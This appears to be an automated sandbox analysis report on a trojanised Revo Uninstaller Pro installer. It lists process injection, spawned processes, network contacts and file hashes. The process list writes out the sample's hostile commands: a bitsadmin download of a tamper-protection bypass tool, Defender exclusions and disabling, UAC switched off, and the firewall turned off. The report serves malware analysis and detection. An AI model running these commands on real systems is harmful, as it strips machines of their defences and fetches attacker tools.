N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 2712 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 2864 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2864 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2840 wrote to memory of 2336 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$50150,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$30186,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\system32\rundll32.exe

"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\system32\regsvr32.exe

"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "

C:\Windows\SysWOW64\mode.com

mode 65,10

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted

C:\Windows\SysWOW64\timeout.exe

timeout /T 180 /NOBREAK

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"111.exe"

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp

Files

memory/1924-0-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/1924-2-0x0000000000401000-0x00000000004A9000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

MD5 d0e24e6d7017127bea02bb0160229bee
SHA1 34350e5b7f268797b2a7ec56390c2228f841b37b
SHA256 ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512 f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

memory/2712-12-0x0000000000400000-0x0000000000689000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-CFOUU.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

MD5 c84933bcccf41369ef9ecce015b86ed0
SHA1 624713276ae217d8d05c03598eecd31209c7f77a
SHA256 ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

MD5 dc21d689cfa1860e8820ed0ee45b1f2a
SHA1 acf2db6df76114601a2e58097629e0c8cbce129b
SHA256 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512 a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

memory/2840-36-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

MD5 b0a7842dd51df8942bc8b837282d1c2b
SHA1 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA256 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512 b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp

MD5 74f1186a6d3bc01716681712c6b24a74
SHA1 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18
SHA256 d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d
SHA512 bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

memory/2712-48-0x0000000000400000-0x0000000000689000-memory.dmp

memory/1924-50-0x0000000000400000-0x00000000004CE000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\iswin7logo.dll

MD5 1ea948aad25ddd347d9b80bef6df9779
SHA1 0be971e67a6c3b1297e572d97c14f74b05dafed3
SHA256 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512 f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

memory/2336-62-0x00000000746E0000-0x00000000746FB000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

memory/2336-79-0x00000000744D0000-0x00000000744E1000-memory.dmp

memory/2336-81-0x0000000001E00000-0x0000000001E0F000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9JN2I.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2aa2713f855ff114ac2fdaaf8e7acfe5
SHA1 1da6223cc9d34b572213d4e6ab3990efba5f4b36
SHA256 82585b756e0cf581f621aff8a299afad83d3595eabcadae3b32fdd4e3c125836
SHA512 72b29461c19c01e8a6fd0f8274b965733f94f758fe7907251160353fc4f1694f4ffdc0eb59067cc1791145e448f5f8cfd039f342b752db5d91385f658446f64b

memory/2336-138-0x0000000001E00000-0x0000000001E0F000-memory.dmp

memory/2336-137-0x00000000744D0000-0x00000000744E1000-memory.dmp

memory/2336-136-0x00000000746E0000-0x00000000746FB000-memory.dmp

memory/2336-135-0x0000000000400000-0x0000000000509000-memory.dmp

memory/2840-134-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2336-174-0x0000000000400000-0x0000000000509000-memory.dmp

\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

MD5 ddb041550a3e69764cd9d7d3de3636f3
SHA1 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA256 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA512 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

MD5 edc78deb34de240c787b1011161e9a4e
SHA1 2d31275530dce33d3bc329991c8ad59e1b303577
SHA256 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512 e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

C:\Windows\System32\drivers\revoflt.sys

MD5 498c3d4d44382a96812a0e0ff28d575b
SHA1 c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA256 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512 ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

memory/2336-319-0x00000000746E0000-0x00000000746FB000-memory.dmp

memory/2336-318-0x0000000000400000-0x0000000000509000-memory.dmp

\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

MD5 75d7bf3468669a6c3df6f4d048315128
SHA1 678d3b531738573520367b47c0cd52cf5e431fa0
SHA256 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA512 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

C:\ProgramData\uzlyLtM20yixSdV\main.bat

MD5 1376349b5831fe5760106870cd5bad6d
SHA1 cf6ff2d17e597893a61fedfd4fe90748ab2349e1
SHA256 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872
SHA512 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

